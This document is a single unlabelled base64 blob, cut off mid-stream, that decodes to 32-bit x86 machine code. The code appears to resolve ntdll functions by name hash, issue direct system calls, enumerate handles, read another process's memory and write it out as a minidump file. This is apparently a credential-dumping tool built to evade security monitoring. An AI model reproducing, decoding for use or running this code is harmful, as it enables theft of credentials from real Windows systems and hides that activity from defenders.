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0XcAcKLRbCJAoNF3ASNlWD///+LRdwBwotFtIkCg0XcBI2VYP///4tF3AHCD7dFuGaJAoNF3AKNlWD///+LRdwBwg+3RbpmiQKDRdwCjZVg////i0XcAcKLRbyJAoNF3ASNlWD///+LRdwBwotFwIkCg0XcBI2VYP///4tF3AHCi0XEiQKDRdwEjZVg////i0XcAcKLRciJAoNF3ASNlWD///+LRdwBwotFzIkCg0XcBI2VYP///4tF3AHCi0XQiQKLRQiLQAiJhVz///+LRZiJRCQIjYVg////iUQkBItFCIkEJOgc+f//hcB1CrgAAAAA6eYAAADHRCQMBAAAAI1FmIlEJAjHRCQEJAAAAItFCIkEJOi6+P//x0QkDAQAAACNhVz///+JRCQIx0QkBCgAAACLRQiJBCTolfj//4tFCItACImFWP///4tF4A+3AA+3wImFVP///8dEJAgEAAAAjYVU////iUQkBItFCIkEJOiP+P//hcB1B7gAAAAA61yLReAPtwAPt9CLReCLQASJVCQIiUQkBItFCIkEJOhi+P//hcB1B7gAAAAA6y+LhVz///+NUBjHRCQMBAAAAI2FWP///4lEJAiJVCQEi0UIiQQk6Pv3//+4AQAAAIt9/MnDVYnlV1ZTgexcAQAAjUWUuyDwQAC6EgAAAInHid6J0fOli0UIiwDHRCQMAQAAAMdEJAgSAAAAjVWUiVQkBIkEJOge2///iUXgg33gAHUKuAAAAADphAUAAItF4IlF5MdFkAAAAADp1QAAAItFkIPAAYlFkItFCItQCItF5ImQFAEAAItF5IPAFMdEJAQAAQAAiQQk6PQuAACJhRj///+LhRj///+DwAGJhRj///+LhRj///8BwImFGP///8dEJAgEAAAAjYUY////iUQkBItFCIkEJOhL9///hcB1HItF4IkEJOiNw///x0XgAAAAALgAAAAA6eQEAACLhRj///+LVeSDwhSJRCQIiVQkBItFCIkEJOgM9///hcB1HItF4IkEJOhOw///x0XgAAAAALgAAAAA6aUEAACLReSLAIlF5IN95AAPhSH///+LRQiLQAiJRYzHRCQIBAAAAI1FkIlEJASLRQiJBCTot/b//4XAdRyLReCJBCTo+cL//8dF4AAAAAC4AAAAAOlQBAAAx4Ug////AAAAAI2VJP///7gAAAAAuRoAAACJ1/Ori0XgiUXk6cQDAACNlaj+//+4AAAAALkcAAAAidfzq4tF5ItQDItACLoAAAAAiYWo/v//iZWs/v//i0Xki0AQiYWw/v//i0Xki4AcAQAAiYW0/v//i0Xki4AYAQAAiYW4/v//i0Xki4AUAQAAiYW8/v//x4XA/v//AAAAAMeFxP7//wAAAADHhcj+//8AAAAAx4XM/v//AAAAAMeF0P7//wAAAADHhdT+//8AAAAAx4XY/v//AAAAAMeF3P7//wAAAADHheD+//8AAAAAx4Xk/v//AAAAAMeF6P7//wAAAADHhez+//8AAAAAx4Xw/v//AAAAAMeF9P7//wAAAADHhfj+//8AAAAAx4X8/v//AAAAAMeFAP///wAAAADHhQj///8AAAAAx4UM////AAAAAMeFEP///wAAAADHhRT///8AAAAAx0XcAAAAAI2VIP///4tF3I0MAouFqP7//4uVrP7//4kBiVEEg0XcCI2VIP///4tF3AHCi4Ww/v//iQKDRdwEjZUg////i0XcAcKLhbT+//+JAoNF3ASNlSD///+LRdwBwouFuP7//4kCg0XcBI2VIP///4tF3AHCi4W8/v//iQKDRdwEjZUg////i0XcAcKLhcD+//+JAoNF3ASNlSD///+LRdwBwouFxP7//4kCg0XcBI2VIP///4tF3AHCi4XI/v//iQKDRdwEjZUg////i0XcAcKLhcz+//+JAoNF3ASNlSD///+LRdwBwouF0P7//4kCg0XcBI2VIP///4tF3AHCi4XU/v//iQKDRdwEjZUg////i0XcAcKLhdj+//+JAoNF3ASNlSD///+LRdwBwouF3P7//4kCg0XcBI2VIP///4tF3AHCi4Xg/v//iQKDRdwEjZUg////i0XcAcKLheT+//+JAoNF3ASNlSD///+LRdwBwouF6P7//4kCg0XcBI2VIP///4tF3AHCi4Xs/v//iQKDRdwEjZUg////i0XcAcKLhfD+//+JAoNF3ASNlSD///+LRdwBwouF9P7//4kCg0XcBI2VIP///4tF3AHCi4X4/v//iQKDRdwEjZUg////i0XcAcKLhfz+//+JAoNF3ASNlSD///+LRdwBwouFAP///4kCg0XcBI2VIP///4tF3I0MAouFCP///4uVDP///4kBiVEEg0XcCI2VIP///4tF3I0MA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